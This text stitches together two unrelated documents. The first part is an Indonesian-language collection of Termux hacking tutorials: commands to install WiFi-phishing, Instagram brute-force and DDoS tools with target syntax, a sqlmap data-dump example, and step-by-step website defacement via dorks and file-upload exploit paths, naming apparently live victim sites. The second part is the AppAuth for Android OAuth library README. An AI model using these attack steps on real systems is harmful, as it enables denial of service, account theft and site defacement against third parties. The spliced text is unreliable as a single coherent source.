python-setuptools $ pip install scapy $ git clone https://github.com/wifiphisher/wifiphisher.git $ cd wifiphisher< $ python setup.py install $ cd wifiphisher $ python wifiphisher Nih yang mau hack WiFi Khusus root $apt update $apt upgrade $apt install git $git clone https://github.com/esc0rtd3w/wifi-hacker $ls $cd Ni KUMPULAN TUTOR TERMUX [X SCREW UP X] *HACK INSTAGRAM* ( sosial engineering) $ apt update && apt upgrade $ pkg install python $ pkg install git $ pkg install nano $ git clone https://github.com/avramit/instahack.git $ ls $ cd instahack $ ls $ pip install requests $ cd instahack $ nano pass.txt $ cat pass.txt $ ls $ python hackinsta.py Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com Lacak IP git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak TOOL DDOS VIA TERMUX 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. 
liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py RED_HAWK tool $ apt update $ apt install git $ git clone https://github.com/Tuhinshubhra/RED_HAWK $ cd RED_HAWK $ chmod +x rhawk.php $ apt install php $ ls $ php rhawk.php ```Install webdav ``` $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav Tutorial Install *Tools-B4J1N64Nv5* pkg install update pkg install git pkg install toilet pkg install figlet pip2 install lolcat git clone https://github.com/DarknessCyberTeam/B4J1N64Nv5 cd B4J1N64Nv5 sh B4J1N64N.sh cara install termux ubuntu - apt update/pkg update - apt upgrade/pkg upgrade - pkg install git - pkg install proot - pkg install wget - git clone https://github.com/Neo-Oli/termux-ubuntu - cd termux-ubuntu - chmod +x ubuntu.sh - pip install -r requirements.txt - ./ubuntu.sh Untuk menjalankan - ./start.sh Cara install github tembak XL Dari awal 1.pkg upgrade 2.pkg update 3.pkg install git 4.pkg install python 5.git clone https://github.com/albertoanggi/xl-py 6.pip install -r requirements.txt 7.chmod +x app.py 8.python/python2 app.py *Install admin finder in termux* $ apt update && apt upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/AdheBolo/AdminFinder *Menjalankan* $ ls $ cd AdminFinder $ chmod 777 AdminFinder.py $ python2 AdminFinder.py *Cara install tool Mr.Rv1.1* $apt update && apt upgrade $pkg install git $pkg install gem $pkg install figlet $gem install lolcat $git clone https://github.com/Mr-R225/Mr.Rv1.1 $cd Mr.Rv1.1 $sh Mr.Rv1.1.sh tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools TOOL FSOCIETY $ git clone https://github.com/manisso/fsociety $ cd fsociety $ ./install.sh $ 
ls $ python2 fsociety.py SQLMAP apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap https://github.com/sqlmapproject/sqlmap.git cd sqlmap Python2 sqlmap.py Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run TOOL D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu… $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt 
install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py DEFACE Hacking Script-Deface $apt update $apt upgrade $apt install git $apt install python2 $git clone https://github.com/Ubaii/script-deface-creator $ls $cd script-deface-creator $ls $chmod +x create.py $ls $python2 create.py done semoga bisa bikin script Html CARA DEFACE Cara1 Siapkan script sendiri.. 1.buka browser kalian apa saja terserah lalu ke google 2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search 3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialog/documenteditordialog.aspx) tanpa buka tutup kurung! E http://sitetarget*org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx 4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian 5.klik yang di bawah nya tunggu sampai loading selesai 6.tambah link target tadi dengan (/files) contoh http://sitetarget*org/files/namascriptdefacekalian.html lalu klik search 7.selesai!! Cara2 Method/metode KCFinder Inurl:/kcfinder/browse.php Inurl:/Kcfinder/ Langsung saja upload file deface anda,lalu panggil dengan tambahan /file/namasckamu.html Contoh: https://basukiwater.com/kcfinder/browse.php jadi https://basukiwater.com/file/namasckamu.html cara3 Deface Onion.to File Upload Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb hehehe... Mari kita Lanjut... Dork : - inurl:/upload site:.onion.to - intext:"Upload" site:.onion.to Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php Step By Step : 1. Dorking Dulu 2. Pilih Web Target 3. 
Pilih File yang mau di'upload 4. Tinggal klik Upload => Done 😆 Contoh Target : https://tt3j2x4k5ycaa5zt.onion.to/uploads/lopeyou.html https://danwin1210.me/uploads/lopeyou.html https://temp.xn--wda.fr/e719x8JgJ.html Mirror?! 😆 https://www.defacer.id/296011.html https://www.defacer.id/296024.html cara4 Metode com media Bahan : 1. Dork : - inurl:com_media site:com - inurl:com_media intext:"Upload" 2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 3. Upload'an : Format .txt 😁 Live Target : http://www.james-insurance.co.uk/ Step by Step : gunakan Live Targert dulu untuk Uji Coba 😁 1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk 2. Pilih salah satu Web 3. Masukkan Exploit http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 4. Lalu Upload file dalam tempat upload ( format .txt ) Akses shell ? Tambahkan : /images/namafile.txt contoh : http://www.james-insurance.co.uk/images/fac.txt Nanti Jadi Gini Hasilnyaa.. Mudah Bukan?! Tinggal Upload ke Defacer.id 😁 cara5 [POC] Vulnerability Simplicity Of Upload #Step 1: Dork: “Powered By: © Simplicity oF Upload” #Step 2: Exploit: http://[situstargetkamu]/PATH/upload.php *Tergantung dengan target. #Step 3: llowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html) #Step 4: Preview: http://[situstargetkamu]/upload/[Your File] #Step 5: Live Demo: http://www.railfaneurope.net/pix/upload.php http://www.formplas.com/upload/upload.php Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya. Al in one crip termux $ apt update && apt upgrade $ pkg install php figlet ruby python python2 $ pip2 install lolcat $ git clone https://github.com/Rusmana-ID/rus $ cd $ cd rus $ ls $ sh v2.sh Kontak wa 083879017166 Note: user name:Rusmana Pasword:X-One
mercerheather476 / Turbo Garbanzo

AppAuth for Android is a client SDK for communicating with [OAuth 2.0](https://tools.ietf.org/html/rfc6749) and [OpenID Connect](http://openid.net/specs/openid-connect-core-1_0.html) providers. It strives to directly map the requests and responses of those specifications, while following the idiomatic style of the implementation language. In addition to mapping the raw protocol flows, convenience methods are available to assist with common tasks like performing an action with fresh tokens.

The library follows the best practices set out in [RFC 8252 - OAuth 2.0 for Native Apps](https://tools.ietf.org/html/rfc8252), including using [Custom Tabs](https://developer.chrome.com/multidevice/android/customtabs) for authorization requests. For this reason, `WebView` is explicitly *not* supported due to usability and security reasons.

The library also supports the [PKCE](https://tools.ietf.org/html/rfc7636) extension to OAuth which was created to secure authorization codes in public clients when custom URI scheme redirects are used. The library is friendly to other extensions (standard or otherwise) with the ability to handle additional parameters in all protocol requests and responses.

A talk providing an overview of using the library for enterprise single sign-on (produced by Google) can be found here: [Enterprise SSO with Chrome Custom Tabs](https://www.youtube.com/watch?v=DdQTXrk6YTk).

## Download

AppAuth for Android is available on [MavenCentral](https://search.maven.org/search?q=g:net.openid%20appauth)

```groovy
implementation 'net.openid:appauth:<version>'
```

## Requirements

AppAuth supports Android API 16 (Jellybean) and above.
Browsers which provide a custom tabs implementation are preferred by the library, but not required. Both Custom URI Schemes (all supported versions of Android) and App Links (Android M / API 23+) can be used with the library.

In general, AppAuth can work with any Authorization Server (AS) that supports native apps as documented in [RFC 8252](https://tools.ietf.org/html/rfc8252), either through custom URI scheme redirects, or App Links. AS's that assume all clients are web-based or require clients to maintain confidentiality of the client secrets may not work well.

## Demo app

A demo app is contained within this repository. For instructions on how to build and configure this app, see the [demo app readme](https://github.com/openid/AppAuth-Android/blob/master/app/README.md).

## Conceptual overview

AppAuth encapsulates the authorization state of the user in the [net.openid.appauth.AuthState](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthState.java) class, and communicates with an authorization server through the use of the [net.openid.appauth.AuthorizationService](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationService.java) class. AuthState is designed to be easily persistable as a JSON string, using the storage mechanism of your choice (e.g. [SharedPreferences](https://developer.android.com/training/basics/data-storage/shared-preferences.html), [sqlite](https://developer.android.com/training/basics/data-storage/databases.html), or even just [in a file](https://developer.android.com/training/basics/data-storage/files.html)).

AppAuth provides data classes which are intended to model the OAuth2 specification as closely as possible; this provides the greatest flexibility in interacting with a wide variety of OAuth2 and OpenID Connect implementations.

Authorizing the user occurs via the user's web browser, and the request is described using instances of [AuthorizationRequest](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationRequest.java). The request is dispatched using [performAuthorizationRequest()](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationService.java#L159) on an AuthorizationService instance, and the response (an [AuthorizationResponse](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationResponse.java) instance) will be dispatched to the activity of your choice, expressed via an Intent.

Token requests, such as obtaining a new access token using a refresh token, follow a similar pattern: [TokenRequest](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/TokenRequest.java) instances are dispatched using [performTokenRequest()](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationService.java#L252) on an AuthorizationService instance, and a [TokenResponse](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/TokenResponse.java) instance is returned via a callback.

Responses can be provided to the [update()](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthState.java#L367) methods on AuthState in order to track and persist changes to the authorization state. Once in an authorized state, the [performActionWithFreshTokens()](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthState.java#L449) method on AuthState can be used to automatically refresh access tokens as necessary before performing actions that require valid tokens.
## Implementing the authorization code flow

It is recommended that native apps use the [authorization code](https://tools.ietf.org/html/rfc6749#section-1.3.1) flow with a public client to gain authorization to access user data. This has the primary advantage for native clients that the authorization flow, which must occur in a browser, only needs to be performed once.

This flow is effectively composed of four stages:

1. Discovering or specifying the endpoints to interact with the provider.
2. Authorizing the user, via a browser, in order to obtain an authorization code.
3. Exchanging the authorization code with the authorization server, to obtain a refresh token and/or ID token.
4. Using access tokens derived from the refresh token to interact with a resource server for further access to user data.

At each step of the process, an AuthState instance can (optionally) be updated with the result to help with tracking the state of the flow.

### Authorization service configuration

First, AppAuth must be instructed how to interact with the authorization service. This can be done either by directly creating an [AuthorizationServiceConfiguration](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationServiceConfiguration.java#L102) instance, or by retrieving an OpenID Connect discovery document.

Directly specifying an AuthorizationServiceConfiguration involves providing the URIs of the authorization endpoint and token endpoint, and optionally a dynamic client registration endpoint (see "Dynamic client registration" for more info):

```java
AuthorizationServiceConfiguration serviceConfig =
    new AuthorizationServiceConfiguration(
        Uri.parse("https://idp.example.com/auth"), // authorization endpoint
        Uri.parse("https://idp.example.com/token")); // token endpoint
```

Where available, using an OpenID Connect discovery document is preferable:

```java
AuthorizationServiceConfiguration.fetchFromIssuer(
    Uri.parse("https://idp.example.com"),
    new AuthorizationServiceConfiguration.RetrieveConfigurationCallback() {
      public void onFetchConfigurationCompleted(
          @Nullable AuthorizationServiceConfiguration serviceConfiguration,
          @Nullable AuthorizationException ex) {
        if (ex != null) {
          Log.e(TAG, "failed to fetch configuration");
          return;
        }

        // use serviceConfiguration as needed
      }
    });
```

This will attempt to download a discovery document from the standard location under this base URI, `https://idp.example.com/.well-known/openid-configuration`. If the discovery document for your IDP is in some other non-standard location, you can instead provide the full URI as follows:

```java
AuthorizationServiceConfiguration.fetchFromUrl(
    Uri.parse("https://idp.example.com/exampletenant/openid-config"),
    new AuthorizationServiceConfiguration.RetrieveConfigurationCallback() {
        ...
      }
    });
```

If desired, this configuration can be used to seed an AuthState instance, to persist the configuration easily:

```java
AuthState authState = new AuthState(serviceConfig);
```

### Obtaining an authorization code

An authorization code can now be acquired by constructing an AuthorizationRequest, using its Builder.
In AppAuth, the builders for each data class accept the mandatory parameters via the builder constructor: ```java AuthorizationRequest.Builder authRequestBuilder = new AuthorizationRequest.Builder( serviceConfig, // the authorization service configuration MY_CLIENT_ID, // the client ID, typically pre-registered and static ResponseTypeValues.CODE, // the response_type value: we want a code MY_REDIRECT_URI); // the redirect URI to which the auth response is sent ``` Other optional parameters, such as the OAuth2 [scope string](https://tools.ietf.org/html/rfc6749#section-3.3) or OpenID Connect [login hint](http://openid.net/specs/openid-connect-core-1_0.html#rfc.section.3.1.2.1) are specified through set methods on the builder: ```java AuthorizationRequest authRequest = authRequestBuilder .setScope("openid email profile https://idp.example.com/custom-scope") .setLoginHint("jdoe@user.example.com") .build(); ``` This request can then be dispatched using one of two approaches. a `startActivityForResult` call using an Intent returned from the `AuthorizationService`, or by calling `performAuthorizationRequest` and providing pending intent for completion and cancelation handling activities. The `startActivityForResult` approach is simpler to use but may require more processing of the result: ```java private void doAuthorization() { AuthorizationService authService = new AuthorizationService(this); Intent authIntent = authService.getAuthorizationRequestIntent(authRequest); startActivityForResult(authIntent, RC_AUTH); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { if (requestCode == RC_AUTH) { AuthorizationResponse resp = AuthorizationResponse.fromIntent(data); AuthorizationException ex = AuthorizationException.fromIntent(data); // ... process the response or exception ... } else { // ... 
} } ``` If instead you wish to directly transition to another activity on completion or cancelation, you can use `performAuthorizationRequest`: ```java AuthorizationService authService = new AuthorizationService(this); authService.performAuthorizationRequest( authRequest, PendingIntent.getActivity(this, 0, new Intent(this, MyAuthCompleteActivity.class), 0), PendingIntent.getActivity(this, 0, new Intent(this, MyAuthCanceledActivity.class), 0)); ``` The intents may be customized to carry any additional data or flags required for the correct handling of the authorization response. #### Capturing the authorization redirect Once the authorization flow is completed in the browser, the authorization service will redirect to a URI specified as part of the authorization request, providing the response via query parameters. In order for your app to capture this response, it must register with the Android OS as a handler for this redirect URI. We recommend using a custom scheme based redirect URI (i.e. those of form `my.scheme:/path`), as this is the most widely supported across all versions of Android. To avoid conflicts with other apps, it is recommended to configure a distinct scheme using "reverse domain name notation". This can either match your service web domain (in reverse) e.g. `com.example.service` or your package name `com.example.app` or be something completely new as long as it's distinct enough. Using the package name of your app is quite common but it's not always possible if it contains illegal characters for URI schemes (like underscores) or if you already have another handler for that scheme - so just use something else. 
When a custom scheme is used, AppAuth can be easily configured to capture all redirects using this custom scheme through a manifest placeholder:

```groovy
android.defaultConfig.manifestPlaceholders = [
  'appAuthRedirectScheme': 'com.example.app'
]
```

Alternatively, the redirect URI can be directly configured by adding an intent-filter for AppAuth's RedirectUriReceiverActivity to your AndroidManifest.xml:

```xml
<activity
    android:name="net.openid.appauth.RedirectUriReceiverActivity"
    tools:node="replace">
  <intent-filter>
    <action android:name="android.intent.action.VIEW"/>
    <category android:name="android.intent.category.DEFAULT"/>
    <category android:name="android.intent.category.BROWSABLE"/>
    <data android:scheme="com.example.app"/>
  </intent-filter>
</activity>
```

If an HTTPS redirect URI is required instead of a custom scheme, the same approach (modifying your AndroidManifest.xml) is used:

```xml
<activity
    android:name="net.openid.appauth.RedirectUriReceiverActivity"
    tools:node="replace">
  <intent-filter>
    <action android:name="android.intent.action.VIEW"/>
    <category android:name="android.intent.category.DEFAULT"/>
    <category android:name="android.intent.category.BROWSABLE"/>
    <data android:scheme="https"
          android:host="app.example.com"
          android:path="/oauth2redirect"/>
  </intent-filter>
</activity>
```

HTTPS redirects can be secured by configuring the redirect URI as an [app link](https://developer.android.com/training/app-links/index.html) in Android M and above. We recommend that a fallback page be configured at the same address to forward authorization responses to your app via a custom scheme, for older Android devices.

#### Handling the authorization response

Upon completion of the authorization flow, the completion Intent provided to performAuthorizationRequest will be triggered.
The authorization response is provided to this activity via Intent extra data, which can be extracted using the `fromIntent()` methods on AuthorizationResponse and AuthorizationException respectively:

```java
public void onCreate(Bundle b) {
  AuthorizationResponse resp = AuthorizationResponse.fromIntent(getIntent());
  AuthorizationException ex = AuthorizationException.fromIntent(getIntent());
  if (resp != null) {
    // authorization completed
  } else {
    // authorization failed, check ex for more details
  }
  // ...
}
```

The response can be provided to the AuthState instance for easy persistence and further processing:

```java
authState.update(resp, ex);
```

If the full redirect URI is required in order to extract additional information that AppAuth does not provide, this is also provided to your activity:

```java
public void onCreate(Bundle b) {
  // ...
  Uri redirectUri = getIntent().getData();
  // ...
}
```

### Exchanging the authorization code

Given a successful authorization response carrying an authorization code, a token request can be made to exchange the code for a refresh token:

```java
authService.performTokenRequest(
    resp.createTokenExchangeRequest(),
    new AuthorizationService.TokenResponseCallback() {
      @Override
      public void onTokenRequestCompleted(
          TokenResponse resp, AuthorizationException ex) {
        if (resp != null) {
          // exchange succeeded
        } else {
          // authorization failed, check ex for more details
        }
      }
    });
```

The token response can also be used to update an AuthState instance:

```java
authState.update(resp, ex);
```

### Using access tokens

Finally, the retrieved access token can be used to interact with a resource server. This can be done directly, by extracting the access token from a token response.
However, in most cases, it is simpler to use the `performActionWithFreshTokens` utility method provided by AuthState:

```java
authState.performActionWithFreshTokens(service, new AuthStateAction() {
  @Override
  public void execute(
      String accessToken,
      String idToken,
      AuthorizationException ex) {
    if (ex != null) {
      // negotiation for fresh tokens failed, check ex for more details
      return;
    }

    // use the access token to do something ...
  }
});
```

This also updates the AuthState object with current access, id, and refresh tokens. If you are storing your AuthState in persistent storage, you should write the updated copy in the callback to this method.

### Ending current session

To end a logged-in session, you need:

- `AuthorizationServiceConfiguration`
- a valid OpenID token, which you should get after authentication
- the end-of-session URI, which should be provided within your OpenID service config

First, build an EndSessionRequest:

```java
EndSessionRequest endSessionRequest =
    new EndSessionRequest.Builder(authorizationServiceConfiguration)
        .setIdTokenHint(idToken)
        .setPostLogoutRedirectUri(endSessionRedirectUri)
        .build();
```

This request can then be dispatched using one of two approaches: a `startActivityForResult` call using an Intent returned from the `AuthorizationService`, or a call to `performEndSessionRequest` that provides pending intents for the completion and cancelation handling activities.
The `startActivityForResult` approach is simpler to use but may require more processing of the result:

```java
private void endSession() {
  AuthorizationService authService = new AuthorizationService(this);
  Intent endSessionIntent = authService.getEndSessionRequestIntent(endSessionRequest);
  startActivityForResult(endSessionIntent, RC_END_SESSION);
}

@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
  if (requestCode == RC_END_SESSION) {
    EndSessionResponse resp = EndSessionResponse.fromIntent(data);
    AuthorizationException ex = AuthorizationException.fromIntent(data);
    // ... process the response or exception ...
  } else {
    // ...
  }
}
```

If instead you wish to directly transition to another activity on completion or cancelation, you can use `performEndSessionRequest`:

```java
AuthorizationService authService = new AuthorizationService(this);

authService.performEndSessionRequest(
    endSessionRequest,
    PendingIntent.getActivity(this, 0, new Intent(this, MyAuthCompleteActivity.class), 0),
    PendingIntent.getActivity(this, 0, new Intent(this, MyAuthCanceledActivity.class), 0));
```

The end-session flow also goes through the browser, using the mechanism described in the authorization section. When transitioning to another activity, handle the response as follows:

```java
public void onCreate(Bundle b) {
  EndSessionResponse resp = EndSessionResponse.fromIntent(getIntent());
  AuthorizationException ex = AuthorizationException.fromIntent(getIntent());
  if (resp != null) {
    // end session completed
  } else {
    // end session failed, check ex for more details
  }
  // ...
}
```

### AuthState persistence

Instances of `AuthState` keep track of the authorization and token requests and responses. This is the only object that you need to persist to retain the authorization state of the session.
Typically, one would do this by storing the authorization state in SharedPreferences or some other persistent store private to the app:

```java
@NonNull
public AuthState readAuthState() {
  SharedPreferences authPrefs = getSharedPreferences("auth", MODE_PRIVATE);
  String stateJson = authPrefs.getString("stateJson", null);
  if (stateJson != null) {
    return AuthState.jsonDeserialize(stateJson);
  } else {
    return new AuthState();
  }
}

public void writeAuthState(@NonNull AuthState state) {
  SharedPreferences authPrefs = getSharedPreferences("auth", MODE_PRIVATE);
  authPrefs.edit()
      .putString("stateJson", state.jsonSerializeString())
      .apply();
}
```

The demo app has an [AuthStateManager](https://github.com/openid/AppAuth-Android/blob/master/app/java/net/openid/appauthdemo/AuthStateManager.java) type which demonstrates this in more detail.

## Advanced configuration

AppAuth provides some advanced configuration options via [AppAuthConfiguration](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AppAuthConfiguration.java) instances, which can be provided to [AuthorizationService](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationService.java) during construction.

### Controlling which browser is used for authorization

Some applications require explicit control over which browsers can be used for authorization - for example, to require that Chrome be used for second factor authentication to work, or require that some custom browser is used for authentication in an enterprise environment.

Control over which browsers can be used can be achieved by defining a [BrowserMatcher](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/BrowserMatcher.java), and supplying this to the builder of AppAuthConfiguration.
A BrowserMatcher is supplied with a [BrowserDescriptor](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/BrowserDescriptor.java) instance, and must decide whether this browser is permitted for the authorization flow.

By default, [AnyBrowserMatcher](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/AnyBrowserMatcher.java) is used.

For your convenience, utility classes to help define a browser matcher are provided, such as:

- [Browsers](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/Browsers.java): contains a set of constants for the official package names and signatures of Chrome, Firefox and Samsung SBrowser.
- [VersionedBrowserMatcher](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/VersionedBrowserMatcher.java): will match a browser if it has a matching package name and signature, and a version number within a defined [VersionRange](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/VersionRange.java). This class also provides some static instances for matching Chrome, Firefox and Samsung SBrowser.
- [BrowserAllowList](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/BrowserAllowList.java): takes a list of BrowserMatcher instances, and will match a browser if any of these child BrowserMatcher instances signals a match.
- [BrowserDenyList](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/BrowserDenyList.java): the inverse of BrowserAllowList - takes a list of browser matcher instances, and will match a browser if it _does not_ match any of these child BrowserMatcher instances.

For instance, in order to restrict the authorization flow to using Chrome or SBrowser as a custom tab:

```java
AppAuthConfiguration appAuthConfig = new AppAuthConfiguration.Builder()
    .setBrowserMatcher(new BrowserAllowList(
        VersionedBrowserMatcher.CHROME_CUSTOM_TAB,
        VersionedBrowserMatcher.SAMSUNG_CUSTOM_TAB))
    .build();
AuthorizationService authService =
    new AuthorizationService(context, appAuthConfig);
```

Or, to prevent the use of a buggy version of the custom tabs in Samsung SBrowser:

```java
AppAuthConfiguration appAuthConfig = new AppAuthConfiguration.Builder()
    .setBrowserMatcher(new BrowserDenyList(
        new VersionedBrowserMatcher(
            Browsers.SBrowser.PACKAGE_NAME,
            Browsers.SBrowser.SIGNATURE_SET,
            true, // when this browser is used via a custom tab
            VersionRange.atMost("5.3")
        )))
    .build();
AuthorizationService authService =
    new AuthorizationService(context, appAuthConfig);
```

### Customizing the connection builder for HTTP requests

It can be desirable to customize how HTTP connections are made when performing token requests, for instance to use [certificate pinning](https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning) or to add additional trusted certificate authorities for an enterprise environment. This can be achieved in AppAuth by providing a custom [ConnectionBuilder](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/connectivity/ConnectionBuilder.java) instance.
For example, to customize the SSL socket factory used, one could do the following:

```java
AppAuthConfiguration appAuthConfig = new AppAuthConfiguration.Builder()
    .setConnectionBuilder(new ConnectionBuilder() {
      @Override
      public HttpURLConnection openConnection(Uri uri) throws IOException {
        URL url = new URL(uri.toString());
        HttpURLConnection connection =
            (HttpURLConnection) url.openConnection();
        // only HTTPS connections carry an SSL socket factory
        if (connection instanceof HttpsURLConnection) {
          HttpsURLConnection httpsConnection = (HttpsURLConnection) connection;
          httpsConnection.setSSLSocketFactory(MySocketFactory.getInstance());
        }
        return connection;
      }
    })
    .build();
```

### Issues with [ID Token](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/IdToken.java#L118) validation

ID Token validation was introduced in `0.8.0` but not all authorization servers or configurations support it correctly.

- For testing environments, [setSkipIssuerHttpsCheck](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AppAuthConfiguration.java#L129) can be used to bypass the requirement that the issuer use HTTPS.

```java
AppAuthConfiguration appAuthConfig = new AppAuthConfiguration.Builder()
    .setSkipIssuerHttpsCheck(true)
    .build();
```

- For services that don't support nonces, resulting in **IdTokenException** `Nonce mismatch`, just set nonce to `null` on the `AuthorizationRequest`. Please consider **raising an issue** with your Identity Provider and removing this once it is fixed.

```java
AuthorizationRequest authRequest = authRequestBuilder
    .setNonce(null)
    .build();
```

## Dynamic client registration

AppAuth supports the [OAuth2 dynamic client registration protocol](https://tools.ietf.org/html/rfc7591).
In order to dynamically register a client, create a [RegistrationRequest](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/RegistrationRequest.java) and dispatch it using [performRegistrationRequest](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationService.java#L278) on your AuthorizationService instance.

The registration endpoint can either be defined directly as part of your [AuthorizationServiceConfiguration](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationServiceConfiguration.java), or discovered from an OpenID Connect discovery document.

```java
RegistrationRequest registrationRequest = new RegistrationRequest.Builder(
    serviceConfig,
    Arrays.asList(redirectUri))
    .build();
```

Requests are dispatched with the help of `AuthorizationService`. As this request is asynchronous the response is passed to a callback:

```java
service.performRegistrationRequest(
    registrationRequest,
    new AuthorizationService.RegistrationResponseCallback() {
      @Override
      public void onRegistrationRequestCompleted(
          @Nullable RegistrationResponse resp,
          @Nullable AuthorizationException ex) {
        if (resp != null) {
          // registration succeeded, store the registration response
          AuthState state = new AuthState(resp);
          // proceed to authorization...
        } else {
          // registration failed, check ex for more details
        }
      }
    });
```

## Utilizing client secrets (DANGEROUS)

We _strongly recommend_ you avoid using static client secrets in your native applications whenever possible. Client secrets derived via a dynamic client registration are safe to use, but static client secrets can be easily extracted from your apps and allow others to impersonate your app and steal user data. If client secrets must be used by the OAuth2 provider you are integrating with, we strongly recommend performing the code exchange step on your backend, where the client secret can be kept hidden.
